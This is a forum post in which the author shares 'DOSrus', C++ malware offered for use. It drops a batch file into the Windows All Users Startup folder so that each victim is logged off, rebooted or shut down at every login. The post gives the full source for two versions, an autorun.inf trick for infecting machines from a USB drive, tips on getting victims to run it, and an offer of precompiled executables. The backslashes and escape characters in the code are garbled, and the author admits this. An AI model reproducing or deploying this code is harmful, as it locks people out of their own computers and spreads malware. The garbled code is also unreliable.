Windows Exploit. Form and function.

[tednugent]

I've been working on this particular exploit for almost a year (since v1) namely because I don't usually feel like sitting down and learning new concepts in C++ which is what I've coded this exploit in. Basically, I started learning DOS a while back and came across the command shutdown.exe. After finding this command, I thought to myself "Gee, wouldn't it be great if I could make this command kill the Windows session on startup?" And from there what I refer to as Version .01 was born. I discovered Windows checks for a file called AUTOEXEC.BAT on startup under the C: > Documents and Settings > All users > Start Menu > Programs > Startup > (AUTOEXEC.BAT) folder. So you can open up notepad and write the lines:

@echo off
shutdown.exe -l
exit

and save the file as AUTOEXEC.BAT and manually move it to the path mentioned above. But this version has obvious limitations. So I began looking into basic file output in C++ and came across fstream. Using fstream, you can output files in a specified location. So open up your C++ editor (I used Dev-C++) and write:

Code:

#include <iostream>
#include <stdlib.h>
#include <stdio.h>
#include <windows.h>
#include <fstream.h>

using namespace std;

int main()
{
 
    ofstream fout("C:documents and settingsall usersstart menuprogramsstartupAUTOEXEC.BAT");
    fout << "@echo offn";
    fout << "shutdown.exe -l";
    fout.close();
    system("shutdown.exe -l");
    return 0;
//Compiled and tested in Dev-C++ courtesy of Rabbid George
//Version 1.0
}

If you give this to someone and convince them to open it, it will install the file AUTOEXEC.BAT in the All users > Start Menu > Programs > Startup path, so that every time they start their computer it will run the file, which is set up to log the user off of their current session. As an added bonus, this file also uses the "system(shutdown.exe -l);" command, which runs DOS commands from your C++ program. This line logs the user off as soon as they open the file, and when they attempt to log back on, they will be logged off. You can even run this file from a portable storage device, and infect users without ever touching their mouse or keyboard. Simply load the file on a flash drive (for example) and put the above compiled file on it and an "autorun.inf" file which should read:

[autorun]
open="nameoffile.exe"

Save the file as autorun.inf and when the flash drive is plugged into a logged on user's computer it will automatically run the file that will log the user off and continue to do so.

But this isn't all that can be done with this command, I created Version 2 which allows you to customize shutdown.exe switches, even if you have no idea how to program or use DOS. This command runs code that lets you decide how to infect the user, giving you the choice to log them off, reboot their computer, or shut down their computer. You can also use a timer (If you use either the reboot or shut down options.) in seconds, so that the computer will not turn off/reboot until the timer has expired. If you choose to use a timer, you may also leave a comment for you victims. The major downsides to this version (which I have NOT fixed) are: There is a glitch in comments, and: it outputs a file you must compile. The glitch in comments is avoidable only as follows: The first character read by the comment interpreter is deleted. That is to say "Hi there" would output as " there" (Note that it leaves the space.) so you should leave a word/char that does not mean anything. Eg: "asdf DIE" would show up as " DIE".

Code:

#include <iostream>
#include <stdlib.h>
#include <windows.h>
#include <fstream>
#include <string>

using namespace std;
using std::string;

int main()
{
    

    string qstn;
    string cmmt;
    string option;
    string random;
    int timer;
    int initltimer;
    
    system(title DOSrus 2.0 FINAL); 
    
    cout << "This is the FINAL version of DOSrus version 2.0.n";
    cout << "-r, -l, or -s.n";
    cin >> option;
    system("cls");
    
    cout << "Timer: (0 = no timer.)n";
    cin >> timer;
    system("cls");
    
    cout << "Comment:n";
    cin >> cmmt;
    getline(cin, cmmt);
    system("cls");

    
    system("cls");
    
    ofstream fout ("C:custom.cpp");
    fout << "#include <iostream>n";
    fout << "#include <stdlib.h>n";
    fout << "#include <stdio.h>n";
    fout << "#include <windows.h>n";
    fout << "#include <fstream.h>nn";
    fout << "using namespace std;nn";
    fout << "int main()n";
    fout << "{nn";
    fout << "ofstream fout ("C:documents and settingsall usersstart menuprogramsstartupAUTOEXEC.BAT");n";
    fout << "fout << "shutdown.exe -t " << timer << " " << option << " -c "" << cmmt <<  """;n";
    fout << "fout.close();n";
    fout << "system("shutdown.exe -t " << timer << " " << option << " -c "" << cmmt <<  """);n";
    fout << "return 0;n";
    fout << "}";
    fout.close();
        
    cout << "The file is ready; enjoy. :-)n";
    cin >> random;
    
    return 0;
    
//Comiled and tested in Dev-C++ Courtesy of Rabbid George
//Version 2.0
}

This should compile in Dev-C++ the first attempt.

IMPORTANT NOTE: DO NOT COMPILE AND RUN (F9 in Dev-C++)
ONLY COMPILE! (CTRL + F9 in Dev-C++).

-Rabbid George.


edit: just noticed the the \s aren't kept in the interpreter. PM me for pre-compiled exe's.